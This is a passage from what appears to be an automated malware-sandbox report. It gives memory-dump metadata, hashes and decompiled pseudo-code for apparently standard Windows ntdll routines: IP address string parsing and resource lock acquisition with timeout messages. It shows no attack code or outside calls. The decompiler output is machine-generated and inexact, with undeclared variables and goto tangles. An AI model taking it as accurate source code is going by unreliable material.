                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: BaseDataModuleQuery
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 3901378454-484625025
                                                              • Opcode ID: e914896808a1b51402609df7fd08d615a0cac8e4d663d878f5da1b789c57cc0e
                                                              • Instruction ID: 8c97210ddeb16cc83786f1c81b8adf3e8ca4ae3415487680b747d22588cdff2e
                                                              • Opcode Fuzzy Hash: e914896808a1b51402609df7fd08d615a0cac8e4d663d878f5da1b789c57cc0e
                                                              • Instruction Fuzzy Hash: 5841B971A4025D7ADB20DB95DCDAFDE77FCAB14700F0005AAB505A60C2EE70DB45CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00AF0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00AC8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00ABDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00AF0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00AF0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00AF06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00AF06BA(_t135, _t178) == 0 || E00AF0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00AF0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00AF0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00AF06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00AF06BA(_t124, _t142) == 0 || E00AF0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                              0x00af0b21
                                                              0x00af0b24
                                                              0x00af0b27
                                                              0x00af0b2a
                                                              0x00af0b2d
                                                              0x00af0b30
                                                              0x00af0b33
                                                              0x00af0b36
                                                              0x00af0b39
                                                              0x00af0b3e
                                                              0x00af0c65
                                                              0x00af0c68
                                                              0x00af0c6a
                                                              0x00af0c6f
                                                              0x00b1eb42
                                                              0x00000000
                                                              0x00000000
                                                              0x00b1eb48
                                                              0x00b1eb48
                                                              0x00af0c75
                                                              0x00af0c7a
                                                              0x00b1eb54
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b1eb5a
                                                              0x00af0c80
                                                              0x00af0c84
                                                              0x00b1eb98
                                                              0x00000000
                                                              0x00000000
                                                              0x00b1eba6
                                                              0x00af0cb8
                                                              0x00af0cba
                                                              0x00af0cd3
                                                              0x00af0cda
                                                              0x00af0ce4
                                                              0x00af0ce9
                                                              0x00000000
                                                              0x00af0cec
                                                              0x00af0c8c
                                                              0x00b1eb63
                                                              0x00000000
                                                              0x00000000
                                                              0x00b1eb70
                                                              0x00b1eb75
                                                              0x00b1eb7d
                                                              0x00000000
                                                              0x00000000
                                                              0x00b1eb8c
                                                              0x00000000
                                                              0x00b1eb8c
                                                              0x00af0c96
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0ca2
                                                              0x00af0cac
                                                              0x00af0cb4
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0b44
                                                              0x00af0b47
                                                              0x00af0b49
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0b4f
                                                              0x00af0b50
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0b56
                                                              0x00af0b62
                                                              0x00af0b7c
                                                              0x00af0bac
                                                              0x00af0a0f
                                                              0x00b1eaaa
                                                              0x00000000
                                                              0x00b1eac4
                                                              0x00b1eac4
                                                              0x00af0bd0
                                                              0x00af0bd0
                                                              0x00af0bd4
                                                              0x00af0bd9
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0bdb
                                                              0x00af0be0
                                                              0x00b1eb0e
                                                              0x00af0a1a
                                                              0x00000000
                                                              0x00af0a1a
                                                              0x00b1eb1a
                                                              0x00b1eb1f
                                                              0x00b1eb27
                                                              0x00000000
                                                              0x00000000
                                                              0x00b1eb36
                                                              0x00000000
                                                              0x00b1eb36
                                                              0x00af0bea
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0bf6
                                                              0x00af0c00
                                                              0x00af0c03
                                                              0x00af0c0b
                                                              0x00000000
                                                              0x00af0c0b
                                                              0x00b1eaaa
                                                              0x00000000
                                                              0x00af0a15
                                                              0x00af0bb6
                                                              0x00000000
                                                              0x00af0bc6
                                                              0x00af0bc6
                                                              0x00af0bcb
                                                              0x00af0c15
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0c1d
                                                              0x00af0c20
                                                              0x00af0c21
                                                              0x00af0c24
                                                              0x00af0c24
                                                              0x00af0c26
                                                              0x00000000
                                                              0x00af0c26
                                                              0x00af0bcd
                                                              0x00000000
                                                              0x00af0bcd
                                                              0x00af0b89
                                                              0x00af0b89
                                                              0x00af0b90
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0b96
                                                              0x00000000
                                                              0x00af0b96
                                                              0x00af0a04
                                                              0x00af0a04
                                                              0x00af0b9a
                                                              0x00af0b9a
                                                              0x00af0b9b
                                                              0x00af0b9f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0ba5
                                                              0x00af0ac7
                                                              0x00af0aca
                                                              0x00b1eacf
                                                              0x00000000
                                                              0x00b1eade
                                                              0x00b1eade
                                                              0x00b1eae3
                                                              0x00000000
                                                              0x00000000
                                                              0x00b1eaf3
                                                              0x00b1eaf6
                                                              0x00b1eaf7
                                                              0x00b1eafe
                                                              0x00b1eb01
                                                              0x00000000
                                                              0x00b1eb01
                                                              0x00b1eacf
                                                              0x00af0ad0
                                                              0x00af0ad4
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0ada
                                                              0x00af0ae6
                                                              0x00af0c34
                                                              0x00000000
                                                              0x00af0c47
                                                              0x00af0c49
                                                              0x00af0c4a
                                                              0x00af0c4e
                                                              0x00af0c51
                                                              0x00af0c54
                                                              0x00af0c57
                                                              0x00af0c5a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00af0c60
                                                              0x00af0afb
                                                              0x00af0afe
                                                              0x00af0b02
                                                              0x00af0b05
                                                              0x00af0b08
                                                              0x00000000
                                                              0x00af0b08
                                                              0x00af0ae6
                                                              0x00af0b44
                                                              0x00af09f8
                                                              0x00af09f8
                                                              0x00af09f9
                                                              0x00000000
                                                              0x00000000
                                                              0x00b1eaa0
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID: .$:$:
                                                              • API String ID: 3965848254-2308638275
                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction ID: 7bc6939c111e1587e2e8db1d81fd013e1c9a103528c49f0c8dc4d61d74fddc21
                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction Fuzzy Hash: B6A18C7190420EDFCF24DFA4C845ABEB7B4AF05305F24856AFA56A7243D7349A82CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 50%
                                                              			E00AF0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b901c0;
									_push(_t144);
									_push(0);
									_t51 = E00AAF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00AF4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00B03F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00B03F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00B3217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00B03F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00AF3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00b901c0;
												_push(_t138);
												_push(0);
												_t58 = E00AAF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00AF4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00B03F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00B03F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00B3217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00B03F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00AF3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00AD5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E00AAF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00AF3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E00AAF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00AF3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E00AAF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00AF3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00AD5329(_t110, _t138);
																_t69 = E00AD53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                              0x00af055a
                                                              0x00af055d
                                                              0x00af0563
                                                              0x00af0566
                                                              0x00af05d8
                                                              0x00af05e2
                                                              0x00af05e5
                                                              0x00000000
                                                              0x00af05e7
                                                              0x00af05e7
                                                              0x00af05ea
                                                              0x00af05f3
                                                              0x00af05f3
                                                              0x00af0568
                                                              0x00af0568
                                                              0x00af0568
                                                              0x00af0569
                                                              0x00af0569
                                                              0x00af0569
                                                              0x00af056b
                                                              0x00000000
                                                              0x00000000
                                                              0x00b1217f
                                                              0x00b12183
                                                              0x00b1225b
                                                              0x00b1225f
                                                              0x00b12189
                                                              0x00b1218c
                                                              0x00b1218f
                                                              0x00b12194
                                                              0x00b12199
                                                              0x00b1219d
                                                              0x00b121a0
                                                              0x00b121a2
                                                              0x00b121ce
                                                              0x00b121ce
                                                              0x00b121ce
                                                              0x00b121d0
                                                              0x00b121d6
                                                              0x00b121de
                                                              0x00b121e2
                                                              0x00b121e8
                                                              0x00b121e9
                                                              0x00b121ec
                                                              0x00b121f1
                                                              0x00b121f6
                                                              0x00000000
                                                              0x00000000
                                                              0x00b121f8
                                                              0x00b121fb
                                                              0x00b12206
                                                              0x00b1220b
                                                              0x00b1220c
                                                              0x00b12217
                                                              0x00b12226
                                                              0x00b1222b
                                                              0x00b1222c
                                                              0x00b1222f
                                                              0x00b12232
                                                              0x00b12235
                                                              0x00b12235
                                                              0x00b1223a
                                                              0x00b1223f
                                                              0x00b12241
                                                              0x00b12243
                                                              0x00b12248
                                                              0x00b12248
                                                              0x00b1224d
                                                              0x00b1224f
                                                              0x00b12262
                                                              0x00b12263
                                                              0x00b12268
                                                              0x00b12269
                                                              0x00b12269
                                                              0x00b12269
                                                              0x00b1226d
                                                              0x00000000
                                                              0x00000000
                                                              0x00b12276
                                                              0x00b12279
                                                              0x00b1227e
                                                              0x00b12283
                                                              0x00b12287
                                                              0x00b1228a
                                                              0x00b1228d
                                                              0x00b1228f
                                                              0x00b122bc
                                                              0x00b122bc
                                                              0x00b122bc
                                                              0x00b122be
                                                              0x00b122c4
                                                              0x00b122cc
                                                              0x00b122d0
                                                              0x00b122d6
                                                              0x00b122d7
                                                              0x00b122da
                                                              0x00b122df
                                                              0x00b122e4
                                                              0x00000000
                                                              0x00000000
                                                              0x00b122e6
                                                              0x00b122e9
                                                              0x00b122f4
                                                              0x00b122f9
                                                              0x00b122fa
                                                              0x00b12305
                                                              0x00b12314
                                                              0x00b12319
                                                              0x00b1231a
                                                              0x00b1231d
                                                              0x00b12320
                                                              0x00b12323
                                                              0x00b12323
                                                              0x00b12328
                                                              0x00b1232d
                                                              0x00b1232f
                                                              0x00b12331
                                                              0x00b12336
                                                              0x00b12336
                                                              0x00b1233b
                                                              0x00b1233d
                                                              0x00b12350
                                                              0x00b12351
                                                              0x00b12356
                                                              0x00b12359
                                                              0x00b12359
                                                              0x00b1235b
                                                              0x00b1235d
                                                              0x00ad5367
                                                              0x00ad536b
                                                              0x00ad5372
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b12363
                                                              0x00b12363
                                                              0x00b12369
                                                              0x00b1236a
                                                              0x00b1236c
                                                              0x00b12371
                                                              0x00b12373
                                                              0x00000000
                                                              0x00b12379
                                                              0x00b12379
                                                              0x00b1237a
                                                              0x00b1237f
                                                              0x00b1237f
                                                              0x00b12385
                                                              0x00b12386
                                                              0x00b12389
                                                              0x00b1238e
                                                              0x00b12390
                                                              0x00ad5378
                                                              0x00ad537c
                                                              0x00b12396
                                                              0x00b12396
                                                              0x00b12397
                                                              0x00b1239c
                                                              0x00b123a2
                                                              0x00b123a3
                                                              0x00b123a6
                                                              0x00b123ab
                                                              0x00b123ad
                                                              0x00000000
                                                              0x00b123b3
                                                              0x00b123b3
                                                              0x00b123b4
                                                              0x00b123b9
                                                              0x00b123ba
                                                              0x00b123ba
                                                              0x00b123bc
                                                              0x00b123bf
                                                              0x00000000
                                                              0x00000000
                                                              0x00b09153
                                                              0x00b09158
                                                              0x00b0915a
                                                              0x00b0915e
                                                              0x00b09160
                                                              0x00000000
                                                              0x00b09166
                                                              0x00b09166
                                                              0x00b09171
                                                              0x00b09176
                                                              0x00b09176
                                                              0x00000000
                                                              0x00b09160
                                                              0x00b123c6
                                                              0x00b123ce
                                                              0x00b123d7
                                                              0x00b123d7
                                                              0x00b123ad
                                                              0x00b12390
                                                              0x00b12373
                                                              0x00b1233f
                                                              0x00b1233f
                                                              0x00000000
                                                              0x00b1233f
                                                              0x00b12291
                                                              0x00b12291
                                                              0x00b12293
                                                              0x00b12295
                                                              0x00b1229a
                                                              0x00b122a1
                                                              0x00b122a3
                                                              0x00b122a7
                                                              0x00b122a9
                                                              0x00000000
                                                              0x00000000
                                                              0x00b122ab
                                                              0x00b122ad
                                                              0x00b122af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b122af
                                                              0x00b122b1
                                                              0x00b122b4
                                                              0x00b122b4
                                                              0x00b122b6
                                                              0x00ad53be
                                                              0x00ad53be
                                                              0x00ad53be
                                                              0x00ad53c0
                                                              0x00000000
                                                              0x00000000
                                                              0x00ad53cb
                                                              0x00ad53ce
                                                              0x00ad53d0
                                                              0x00ad53d4
                                                              0x00ad53d6
                                                              0x00000000
                                                              0x00ad53d8
                                                              0x00ad53e3
                                                              0x00ad53ea
                                                              0x00ad53ea
                                                              0x00000000
                                                              0x00ad53d6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b122b6
                                                              0x00000000
                                                              0x00b1228f
                                                              0x00b12349
                                                              0x00b1234d
                                                              0x00b12251
                                                              0x00b12251
                                                              0x00000000
                                                              0x00b12251
                                                              0x00b121a4
                                                              0x00b121a4
                                                              0x00b121a6
                                                              0x00b121a8
                                                              0x00b121ac
                                                              0x00b121b6
                                                              0x00b121b8
                                                              0x00b121bc
                                                              0x00b121be
                                                              0x00000000
                                                              0x00000000
                                                              0x00b121c0
                                                              0x00b121c2
                                                              0x00b121c4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b121c4
                                                              0x00b121c6
                                                              0x00b121c6
                                                              0x00b121c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b121c8
                                                              0x00b121a2
                                                              0x00000000
                                                              0x00b12183
                                                              0x00af057b
                                                              0x00af057d
                                                              0x00af0581
                                                              0x00af0583
                                                              0x00b12178
                                                              0x00000000
                                                              0x00af0589
                                                              0x00af058f
                                                              0x00af058f
                                                              0x00af0583
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B12206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-4236105082
                                                              • Opcode ID: 55c120193cc91647c5914f0e9ac9ba13bf0b2d3894db695e378a5dfe1ebac4b1
                                                              • Instruction ID: 6d0e794618689917f0a0238d4e79fed460fe4c2a4b2ef2dd5fd991b651afa876
                                                              • Opcode Fuzzy Hash: 55c120193cc91647c5914f0e9ac9ba13bf0b2d3894db695e378a5dfe1ebac4b1
                                                              • Instruction Fuzzy Hash: 78512B35B002156FEB15CB18CC81FE633E9EF98710F2182A9FD55EB286DA71EC918790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E00AF14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
